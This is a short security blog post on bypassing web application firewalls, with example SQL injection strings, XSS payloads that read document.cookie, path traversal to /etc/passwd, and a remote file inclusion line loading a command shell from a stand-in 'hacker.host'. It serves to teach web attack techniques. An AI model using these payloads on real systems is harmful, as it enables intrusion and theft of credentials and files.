Home 0P3N Blog Part 1: Bypass a Web Application Firewall (WAF)
Ready to Start Your Career?
Create Free Account
S-Connect s profile image
By: S-Connect
July 22, 2016

Part 1: Bypass a Web Application Firewall (WAF)

By: S-Connect
July 22, 2016
S-Connect s profile image
By: S-Connect
July 22, 2016
Part 1: Bypass a Web Application Firewall (WAF) - CybraryMethods to Reduce the ThreatsDirective Approach
  • Software Development Life Cycle (SDLC); «paper security»; organization of high-level processes
Detective Approach
  • Black/white-box testing of functions; fuzzing; static/dynamic/manual analysis of program code
Preventive Approach
  • Intrusion Detection/Prevention Systems (IDS/IPS), Web Application Firewall (WAF)
 What is WAF?waf Methods to Bypass WAFcartoon
  1. SQL Injection

There are two types of SQL Injection:

  • SQL Injection into a string parameter Example: SELECT * from table where name = ‘Name’
  • SQL Injection into a numeric parameter Example: SELECT * from table where id = 123

Exploitation of SQL Injection vulnerabilities is divided into classes according to the DBMS type and injection conditions

  • A vulnerable request can get into Insert, Update, Delete, etc.

Example: UPDATE users SET pass = ‘1’ where user = ‘t1’OR 1=1–‘

  • Blind SQL Injection

Example: select * from table where id = 1 AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(2000000,md5(now())))

  • Exploitation features for various DBMSs

Example: (MySQL): SELECT * from table where id = 1 union select 1,2,3

Example: (PostgreSQL): SELECT * from table where id = 1; select 1,2,3

  1. Cross-Site Scripting (XSS)

There are two types Cross-Site Scripting (XSS):

  • Persistent/stored
  • Non-persistent/reflected

Cross-Site Scripting vulnerabilities typically occur in:

  • HTML tags
  • The body of JavaScript/VBScript/etc. (e.g. DOM-based)
  • HTML code
  • HTML tag parameters
  •  Java
  • Flash
  • Cross-Site Scripting is client-side vulnerability
  • Microsoft Internet Explorer 8 XSS filter
  • Mozilla No Script Firefox extension
 General Issues:
  • Stored XSS

If an attacker managed to push XSS through the filter, WAF wouldn’t be able to prevent the attack conduction

  • Reflected XSS in Java Script

Example: <script> … setTimeout(”writetitle()”,$_GET[xss]) … </script>

Exploitation: /?xss=500); alert(document.cookie);//

  • DOM-based XSS

Example: <script> … eval($_GET[xss]); … </script>

Exploitation: /?xss=document.cookie

Similar problems take place in the filters that protect systems from XSS at the client-side level (e.g.,IE8)

A Cross-Site Scripting attack can successfully bypass the WAF and be conducted in all following cases:

  • Exploitation of DOM-based XSS
  • Using HPP and HPF techniques
  • Similar to exploitation of SQL Injection vulnerabilities, bypassing filter rules (signatures) and using vulnerabilities in the functions of WAF request normalization
 
  1. Path Traversal, Local/Remote File Inclusion

An example of Path Traversal Vulnerability:

  • Program logics:

<? include($_GET[‘file’].”.txt”) ;?>

index.php?file=myfile

  • Exploitation example: index.php?file=/../../../../../etc/passwd%00

Risks represented byLocal File Inclusion vulnerabilities:

  • Functions include()and require()regard text as a part of program code!
  • Exploitation example:index.php?file=img/command_shell.jpg%00

Appearance of Remote File Inclusion:

  • If allow_url_fopen & allow_url_includeare enabled, then:

index.php?file=https://hacker.host/command_shell

An example of Path Traversal vulnerability:

  • Program logics:

<? include (“./files/”.$_GET[‘file’]) ;?>

  • Vulnerability exploitation: /?id=/union%20select/../../../../../../../etc/passwd

The request becomes: <? include(“./files//uniX on%20sel X ect/../../../../../../../etc/passwd”) ;?>

Stay Linked!!Ali Tabish
Schedule Demo

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry